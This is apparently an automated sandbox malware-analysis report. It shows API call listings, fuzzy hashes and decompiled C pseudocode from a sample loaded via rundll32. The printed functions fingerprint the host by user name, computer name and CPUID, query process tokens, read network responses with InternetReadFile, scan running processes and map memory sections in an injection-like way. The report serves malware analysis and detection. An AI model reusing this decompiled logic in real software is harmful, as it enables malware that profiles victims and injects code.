                                                          • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,059695B0,00000020,?,?,00000010), ref: 036D60C8
                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,059695B0,?,?,00000010), ref: 036D60DF
                                                          • GetLastError.KERNEL32(?,?,00000010), ref: 036D60F7
                                                          • GetLastError.KERNEL32 ref: 036D6129
                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 036D6135
                                                          • GetLastError.KERNEL32 ref: 036D613D
                                                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 036D614A
                                                          • GetLastError.KERNEL32(?,?,?,036D24D8,00000001,036D58D7,00000000,?,036D1D97,00000000,036D58D7,?,75BCC740,036D58D7,00000000,059695B0), ref: 036D6152
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
• Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                                                          • String ID:
                                                          • API String ID: 1967744295-0
                                                          • Opcode ID: b578199a12a3e25633d14af03cac8e7a9aa016bd3e4f72839a25c5cb3b7d76d2
                                                          • Instruction ID: 836ec3413eb91b3df828870aa4ab0e6a051a8b5a919b5b861f594f50fcd83932
                                                          • Opcode Fuzzy Hash: b578199a12a3e25633d14af03cac8e7a9aa016bd3e4f72839a25c5cb3b7d76d2
                                                          • Instruction Fuzzy Hash: C3514CB1D00208FFDB10EFA8ED84AAEBFB9FB04344F448429F945E6244D7719A14DB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
Control-flow graph of function 036D3365 (rendered graph; node and edge data omitted)
                                                          C-Code - Quality: 96%
                                                          			E036D3365(char __eax, void* __esi) {
                                                          				long _v8;
                                                          				char _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				signed int _v28;
                                                          				long _t34;
                                                          				signed int _t39;
                                                          				long _t50;
                                                          				char _t59;
                                                          				intOrPtr _t61;
                                                          				void* _t62;
                                                          				void* _t64;
                                                          				char _t65;
                                                          				intOrPtr* _t67;
                                                          				void* _t68;
                                                          				void* _t69;
                                                          
                                                          				_t69 = __esi;
                                                          				_t65 = __eax;
                                                          				_v8 = 0;
                                                          				_v12 = __eax;
                                                          				if(__eax == 0) {
                                                          					_t59 =  *0x36da310; // 0xd448b889
                                                          					_v12 = _t59;
                                                          				}
                                                          				_t64 = _t69;
                                                          				E036D2119( &_v12, _t64);
                                                          				if(_t65 != 0) {
                                                          					 *_t69 =  *_t69 ^  *0x36da344 ^ 0x46d76429;
                                                          				} else {
                                                          					GetUserNameW(0,  &_v8); // executed
                                                          					_t50 = _v8;
                                                          					if(_t50 != 0) {
                                                          						_t62 = RtlAllocateHeap( *0x36da2d8, 0, _t50 + _t50);
                                                          						if(_t62 != 0) {
                                                          							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                          								_t64 = _t62;
                                                          								 *_t69 =  *_t69 ^ E036D708D(_v8 + _v8, _t64);
                                                          							}
                                                          							HeapFree( *0x36da2d8, 0, _t62);
                                                          						}
                                                          					}
                                                          				}
                                                          				_t61 = __imp__;
                                                          				_v8 = _v8 & 0x00000000;
                                                          				GetComputerNameW(0,  &_v8);
                                                          				_t34 = _v8;
                                                          				if(_t34 != 0) {
                                                          					_t68 = RtlAllocateHeap( *0x36da2d8, 0, _t34 + _t34);
                                                          					if(_t68 != 0) {
                                                          						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                          							_t64 = _t68;
                                                          							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E036D708D(_v8 + _v8, _t64);
                                                          						}
                                                          						HeapFree( *0x36da2d8, 0, _t68);
                                                          					}
                                                          				}
                                                          				asm("cpuid");
                                                          				_t67 =  &_v28;
                                                          				 *_t67 = 1;
                                                          				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                          				 *((intOrPtr*)(_t67 + 8)) = 0;
                                                          				 *(_t67 + 0xc) = _t64;
                                                          				_t39 = _v16 ^ _v20 ^ _v28;
                                                          				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                                          				return _t39;
                                                          			}

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 036D339C
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 036D33B3
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 036D33C0
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 036D33E1
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 036D3408
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 036D341C
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 036D3429
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 036D3447
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
• Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: HeapName$AllocateComputerFreeUser
                                                          • String ID:
                                                          • API String ID: 3239747167-0
                                                          • Opcode ID: 244d19eb9d45c2dfa52af4567eecb27cad85c6472101678d3b72be25303f505d
                                                          • Instruction ID: 39b29ab8b290d0f03ceb94bfbda0fec85b879db253913afe0136e60aa68d7602
                                                          • Opcode Fuzzy Hash: 244d19eb9d45c2dfa52af4567eecb27cad85c6472101678d3b72be25303f505d
                                                          • Instruction Fuzzy Hash: 62315A75E00205EFDB10EFA9ED81A6EB7F9FF48200F694469E504D7318DB30EA119B61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          • StrRChrA.SHLWAPI(0689B5B0,00000000,0000005C,?,?,?), ref: 06279028
                                                          • _strupr.NTDLL ref: 0627903E
                                                          • lstrlen.KERNEL32(0689B5B0,?,?), ref: 06279046
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?), ref: 062790C6
                                                          • RtlAddVectoredExceptionHandler.NTDLL(00000000,0629076B), ref: 062790ED
                                                          • GetLastError.KERNEL32(?,?,?,?), ref: 06279107
                                                          • RtlRemoveVectoredExceptionHandler.NTDLL(061605B8), ref: 0627911D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionHandlerVectored$CreateErrorEventLastRemove_struprlstrlen
                                                          • String ID:
                                                          • API String ID: 2251957091-0
                                                          • Opcode ID: ef11461e8d60aa035c96a087b598c1df6b18e36e54b1886e189fc1fce90949b0
                                                          • Instruction ID: 5aa408087e8cf4f51762028f77259e4975f617ccfc3ccb1af70b2e6289b51b85
                                                          • Opcode Fuzzy Hash: ef11461e8d60aa035c96a087b598c1df6b18e36e54b1886e189fc1fce90949b0
                                                          • Instruction Fuzzy Hash: AA31A672E203155FEB91AFB8FC8CD6E77AAA785250B150425EF12E7140D6358881CFB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 38%
                                                          			E036D4321(char _a4, void* _a8) {
                                                          				void* _v8;
                                                          				void* _v12;
                                                          				char _v16;
                                                          				void* _v20;
                                                          				char _v24;
                                                          				char _v28;
                                                          				char _v32;
                                                          				char _v36;
                                                          				char _v40;
                                                          				void* _v44;
                                                          				void** _t33;
                                                          				void* _t40;
                                                          				void* _t43;
                                                          				void** _t44;
                                                          				intOrPtr* _t47;
                                                          				char _t48;
                                                          
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_v20 = _a4;
                                                          				_t48 = 0;
                                                          				_v16 = 0;
                                                          				_a4 = 0;
                                                          				_v44 = 0x18;
                                                          				_v40 = 0;
                                                          				_v32 = 0;
                                                          				_v36 = 0;
                                                          				_v28 = 0;
                                                          				_v24 = 0;
                                                          				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                          					_t33 =  &_v8;
                                                          					__imp__(_v12, 8, _t33);
                                                          					if(_t33 >= 0) {
                                                          						_t47 = __imp__;
                                                          						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                          						_t44 = E036D6D63(_a4);
                                                          						if(_t44 != 0) {
                                                          							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                          							if(_t40 >= 0) {
                                                          								memcpy(_a8,  *_t44, 0x1c);
                                                          								_t48 = 1;
                                                          							}
                                                          							E036D6C2C(_t44);
                                                          						}
                                                          						NtClose(_v8); // executed
                                                          					}
                                                          					NtClose(_v12);
                                                          				}
                                                          				return _t48;
                                                          			}

                                                          APIs
                                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 036D4368
                                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 036D437B
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 036D4397
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 036D43B4
                                                          • memcpy.NTDLL(?,00000000,0000001C), ref: 036D43C1
                                                          • NtClose.NTDLL(?), ref: 036D43D3
                                                          • NtClose.NTDLL(00000000), ref: 036D43DD
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
• Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 2575439697-0
                                                          • Opcode ID: c7da4e0e574f2c834213e9a6bcd41c53372be40fcc4a60cef712047eb1b0307b
                                                          • Instruction ID: 4dfea6284488a1e65a8e57cbcd81993d70214dd847e14226e1f48e0c8e1e3cdb
                                                          • Opcode Fuzzy Hash: c7da4e0e574f2c834213e9a6bcd41c53372be40fcc4a60cef712047eb1b0307b
                                                          • Instruction Fuzzy Hash: EB21FAB5D00218BBDF01EF95EC85ADEBFBDEF08740F10802AF905E6114D7B19A559BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 0627C478
                                                          • NtOpenProcessToken.NTDLL(?,00000008,?), ref: 0627C48B
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 0627C4A7
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 0627C4C4
                                                          • memcpy.NTDLL(?,00000000,0000001C), ref: 0627C4D1
                                                          • NtClose.NTDLL(?), ref: 0627C4E3
                                                          • NtClose.NTDLL(?), ref: 0627C4ED
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 2575439697-0
                                                          • Opcode ID: 3c12722c464614b93e2160fbf4a1ae3a427add7b81d82a0457b57bcbd71e68a4
                                                          • Instruction ID: aed0133921d627fdcc85e7e847b0ed5562d7327c98011a0cc4f67000a8e16286
                                                          • Opcode Fuzzy Hash: 3c12722c464614b93e2160fbf4a1ae3a427add7b81d82a0457b57bcbd71e68a4
                                                          • Instruction Fuzzy Hash: B021F4B2A10218AFDB41AFA5DC48EDEBFBDEF48B40F104022FA05B6150D7718A40DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memcpy.NTDLL(?,?,?,0627C71A,?,?,?,?,?,0627C71A,?,?,00000000), ref: 06286F59
                                                            • Part of subcall function 0627C4FB: GetModuleHandleA.KERNEL32(?,?,?,06287017,?,?,?,00000000), ref: 0627C539
                                                            • Part of subcall function 0627C4FB: memcpy.NTDLL(?,0629A30C,00000018,?,?,?), ref: 0627C5B5
                                                          • memcpy.NTDLL(?,?,00000018,0627C71A,?,?,?,?,?,0627C71A,?,?,00000000), ref: 06286FA7
                                                          • memcpy.NTDLL(?,0628DD8F,00000800,?,?,?,00000000), ref: 0628702A
                                                          • NtUnmapViewOfSection.NTDLL(000000FF,00000000,?,00000000), ref: 06287068
                                                          • NtClose.NTDLL(00000000,?,00000000), ref: 0628708F
                                                            • Part of subcall function 06288F62: GetModuleHandleA.KERNEL32(?,00000020,?,00008664,?,0627C71A,0627C71A,?,06286EFA,?,0627C71A,?,?,00000000), ref: 06288F87
                                                            • Part of subcall function 06288F62: GetProcAddress.KERNEL32(00000000,?), ref: 06288FA9
                                                            • Part of subcall function 06288F62: GetProcAddress.KERNEL32(00000000,?), ref: 06288FBF
                                                            • Part of subcall function 06288F62: GetProcAddress.KERNEL32(00000000,?), ref: 06288FD5
                                                            • Part of subcall function 06288F62: GetProcAddress.KERNEL32(00000000,?), ref: 06288FEB
                                                            • Part of subcall function 06288F62: GetProcAddress.KERNEL32(00000000,?), ref: 06289001
                                                            • Part of subcall function 0628BE80: NtMapViewOfSection.NTDLL(00000000,000000FF,0627717E,00000000,00000000,0627717E,?,00000002,00000000,?,0627C71A,00000000,0627717E,000000FF,?), ref: 0628BEAE
                                                            • Part of subcall function 06281CE4: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,0627C71A,?,?,00000000), ref: 06281D58
                                                            • Part of subcall function 06281CE4: memcpy.NTDLL(?,?,?), ref: 06281DBF
                                                          • memset.NTDLL ref: 062870AA
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: memcpy$AddressProc$HandleModuleSectionView$CloseUnmapmemset
                                                          • String ID:
                                                          • API String ID: 3674896251-0
                                                          • Opcode ID: a6470d6000f3ce3a1823bedc2e9a5f2273db41fe409bb3ed3115d5093886461a
                                                          • Instruction ID: 4a55aeaac2151b9cf55d631daa123abfb7445355c09a6fcd047cffd566cf82ef
                                                          • Opcode Fuzzy Hash: a6470d6000f3ce3a1823bedc2e9a5f2273db41fe409bb3ed3115d5093886461a
                                                          • Instruction Fuzzy Hash: DBA14B71D1120AEFDB91EFA8CC84BAEBBB4BF04304F144569ED11A7290E771EA54DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 71%
                                                          			E036D1CA5(void* __eax, void* __ecx) {
                                                          				long _v8;
                                                          				void* _v12;
                                                          				void* _v16;
                                                          				void _v20;
                                                          				void* __esi;
                                                          				void* _t30;
                                                          				void* _t38;
                                                          				intOrPtr* _t39;
                                                          				intOrPtr* _t41;
                                                          				int _t45;
                                                          				long _t47;
                                                          				void* _t54;
                                                          				long _t64;
                                                          				void* _t67;
                                                          				void* _t69;
                                                          
                                                          				_t58 = __ecx;
                                                          				_t67 = __eax;
                                                          				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                                                          					L2:
                                                          					_t30 = _t67;
                                                          					_pop(_t68);
                                                          					_t69 = _t30;
                                                          					_t64 = 0;
                                                          					ResetEvent( *(_t69 + 0x1c));
                                                          					if(InternetReadFile( *(_t69 + 0x18),  &_v20, 4,  &_v8) != 0) {
                                                          						L9:
                                                          						if(_v8 == 0) {
                                                          							 *((intOrPtr*)(_t69 + 0x30)) = 0;
                                                          						} else {
                                                          							 *0x36da174(0, 1,  &_v12); // executed
                                                          							if(0 != 0) {
                                                          								_t64 = 8;
                                                          							} else {
                                                          								_t38 = E036D6D63(0x1000);
                                                          								_v16 = _t38;
                                                          								if(_t38 == 0) {
                                                          									_t64 = 8;
                                                          								} else {
                                                          									_push(0);
                                                          									_push(_v8);
                                                          									_push( &_v20);
                                                          									while(1) {
                                                          										_t41 = _v12;
                                                          										_t61 =  *_t41;
                                                          										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
                                                          										ResetEvent( *(_t69 + 0x1c));
                                                          										_t45 = InternetReadFile( *(_t69 + 0x18), _v16, 0x1000,  &_v8); // executed
                                                          										if(_t45 != 0) {
                                                          											goto L17;
                                                          										}
                                                          										_t64 = GetLastError();
                                                          										if(_t64 == 0x3e5) {
                                                          											_t64 = E036D6E40( *(_t69 + 0x1c), _t61, 0xffffffff);
                                                          											if(_t64 == 0) {
                                                          												_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                                          												if(_t64 == 0) {
                                                          													goto L17;
                                                          												}
                                                          											}
                                                          										}
                                                          										L19:
                                                          										E036D6C2C(_v16);
                                                          										if(_t64 == 0) {
                                                          											_t47 = E036D15CC(_v12, _t69); // executed
                                                          											_t64 = _t47;
                                                          										}
                                                          										goto L22;
                                                          										L17:
                                                          										_t64 = 0;
                                                          										if(_v8 != 0) {
                                                          											_push(0);
                                                          											_push(_v8);
                                                          											_push(_v16);
                                                          											continue;
                                                          										}
                                                          										goto L19;
                                                          									}
                                                          								}
                                                          								L22:
                                                          								_t39 = _v12;
                                                          								 *((intOrPtr*)( *_t39 + 8))(_t39);
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_t64 = GetLastError();
                                                          						if(_t64 != 0x3e5) {
                                                          							L8:
                                                          							if(_t64 == 0) {
                                                          								goto L9;
                                                          							}
                                                          						} else {
                                                          							_t64 = E036D6E40( *(_t69 + 0x1c), _t58, 0xffffffff);
                                                          							if(_t64 == 0) {
                                                          								_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                                          								goto L8;
                                                          							}
                                                          						}
                                                          					}
                                                          					return _t64;
                                                          				} else {
                                                          					_t54 = E036D4A85(__ecx, __eax);
                                                          					if(_t54 != 0) {
                                                          						return _t54;
                                                          					} else {
                                                          						goto L2;
                                                          					}
                                                          				}
                                                          			}

                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,76CC81D0,00000000,00000000), ref: 036D739C
                                                          • InternetReadFile.WININET(?,?,00000004,?), ref: 036D73AB
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,036D593D,00000000,?,?), ref: 036D73B5
                                                          • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,036D593D,00000000,?), ref: 036D742E
                                                          • InternetReadFile.WININET(?,?,00001000,?), ref: 036D743F
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,036D593D,00000000,?,?), ref: 036D7449
                                                            • Part of subcall function 036D4A85: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,76CC81D0,00000000,00000000), ref: 036D4A9C
                                                            • Part of subcall function 036D4A85: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,036D593D,00000000,?), ref: 036D4AAC
                                                            • Part of subcall function 036D4A85: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 036D4ADE
                                                            • Part of subcall function 036D4A85: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 036D4B03
                                                            • Part of subcall function 036D4A85: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 036D4B23
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: EventHttpInfoQuery$ErrorFileInternetLastReadReset$ObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 2393427839-0
                                                          • Opcode ID: aa2c4adea21e9a316bce7a5595e691eefcf3cc56ed2e1b1d1369f6cb4775c2c0
                                                          • Instruction ID: e70f57c5d37923a2f3df55f0eed01028ef821e6aed31f9025928f4305f32f860
                                                          • Opcode Fuzzy Hash: aa2c4adea21e9a316bce7a5595e691eefcf3cc56ed2e1b1d1369f6cb4775c2c0
                                                          • Instruction Fuzzy Hash: 7C41F832E00304AFCB22EFA4DD44F6EBBBDAF84364F194569E585D7254D770E9018B61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0628235C
                                                          • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 06282369
                                                          • NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 062823F5
                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 06282400
                                                          • RtlImageNtHeader.NTDLL(00000000), ref: 06282409
                                                          • RtlExitUserThread.NTDLL(00000000), ref: 0628241E
                                                            • Part of subcall function 06280818: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,06282397,?), ref: 06280820
                                                            • Part of subcall function 06280818: GetVersion.KERNEL32 ref: 0628082F
                                                            • Part of subcall function 06280818: GetCurrentProcessId.KERNEL32 ref: 0628084B
                                                            • Part of subcall function 06280818: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 06280868
                                                            • Part of subcall function 0627C7B6: memcpy.NTDLL(00000000,?,?,?,?,?,?,?), ref: 0627C815
                                                            • Part of subcall function 0627A698: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,06277D5E), ref: 0627A6BE
                                                            • Part of subcall function 0628212C: GetModuleHandleA.KERNEL32(?,?,?,?,?,0627111D,00000000), ref: 0628214D
                                                            • Part of subcall function 0628212C: GetProcAddress.KERNEL32(00000000,?), ref: 06282166
                                                            • Part of subcall function 0628212C: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,0627111D,00000000), ref: 06282183
                                                            • Part of subcall function 0628212C: IsWow64Process.KERNEL32(?,?,?,?,?,?,0627111D,00000000), ref: 06282194
                                                            • Part of subcall function 0628212C: FindCloseChangeNotification.KERNEL32(?,?,?,?,0627111D,00000000), ref: 062821A7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$Module$CreateFileHandleOpenThreadTime$AddressChangeCloseCurrentEventExitFindHeaderHeapImageInformationNameNotificationProcQuerySystemUserVersionWow64memcpy
                                                          • String ID:
                                                          • API String ID: 2581485877-0
                                                          • Opcode ID: b3ceba7095d807c6555e281d8749d37c29bb608dcf62b4b26bdc22a952b02f7f
                                                          • Instruction ID: c43c810bec7bc6c6683b79c885ee7dd84ee4c488f8e50d2f0313242334ed5982
                                                          • Opcode Fuzzy Hash: b3ceba7095d807c6555e281d8749d37c29bb608dcf62b4b26bdc22a952b02f7f
                                                          • Instruction Fuzzy Hash: 9F31A271A22214EFCB52EF74EC88EAD77A9FB85754B104125FA16E7180D6349E44CBE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E036D68BD() {
                                                          				char _v264;
                                                          				void* _v300;
                                                          				void* _t5;
                                                          				int _t8;
                                                          				intOrPtr _t9;
                                                          				int _t15;
                                                          				void* _t17;
                                                          
                                                          				_t15 = 0;
                                                          				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
                                                          				_t17 = _t5;
                                                          				if(_t17 != 0) {
                                                          					_t8 = Process32First(_t17,  &_v300);
                                                          					while(_t8 != 0) {
                                                          						_t9 =  *0x36da348; // 0x228d5a8
                                                          						_t2 = _t9 + 0x36dbeb0; // 0x73617661
                                                          						_push( &_v264);
                                                          						if( *0x36da12c() != 0) {
                                                          							_t15 = 1;
                                                          						} else {
                                                          							_t8 = Process32Next(_t17,  &_v300);
                                                          							continue;
                                                          						}
                                                          						L7:
                                                          						FindCloseChangeNotification(_t17); // executed
                                                          						goto L8;
                                                          					}
                                                          					goto L7;
                                                          				}
                                                          				L8:
                                                          				return _t15;
                                                          			}

                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 036D68CD
                                                          • Process32First.KERNEL32(00000000,?), ref: 036D68E0
                                                          • Process32Next.KERNEL32(00000000,?), ref: 036D690C
                                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 036D691B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 3243318325-0
                                                          • Opcode ID: c7f3b7fe4c28cc00bfc2376ba7059bbeda233e10586a2ab2478f35fea435e470
                                                          • Instruction ID: e25702ba0aefa2a5af7f27b1ef2b2379dc8632486415615afc272fc1800a8f6e
                                                          • Opcode Fuzzy Hash: c7f3b7fe4c28cc00bfc2376ba7059bbeda233e10586a2ab2478f35fea435e470
                                                          • Instruction Fuzzy Hash: D4F02476D012256BC730F672DC08EEBB7ACDBC9310F4000A5EA06CB104EB34DA5A86A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000), ref: 06277167
                                                            • Part of subcall function 0628BE80: NtMapViewOfSection.NTDLL(00000000,000000FF,0627717E,00000000,00000000,0627717E,?,00000002,00000000,?,0627C71A,00000000,0627717E,000000FF,?), ref: 0628BEAE
                                                          • memset.NTDLL ref: 0627718B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Section$CreateViewmemset
                                                          • String ID: @
                                                          • API String ID: 2533685722-2766056989
                                                          • Opcode ID: 04c01abe87f767a248b9930281d971bf0f910e73e3e0dd3ac0084e908f5bf650
                                                          • Instruction ID: a46d19ac533c28dd689895722da385433de8c2f0df1362f477024004e177fa30
                                                          • Opcode Fuzzy Hash: 04c01abe87f767a248b9930281d971bf0f910e73e3e0dd3ac0084e908f5bf650
                                                          • Instruction Fuzzy Hash: 49211AB6D10209AFDB11DFA9C8849EEFBF9EF48354F104569E615F3250D730AA448FA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetProcAddress.KERNEL32(?,00000318), ref: 062861D3
                                                          • NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 062861EF
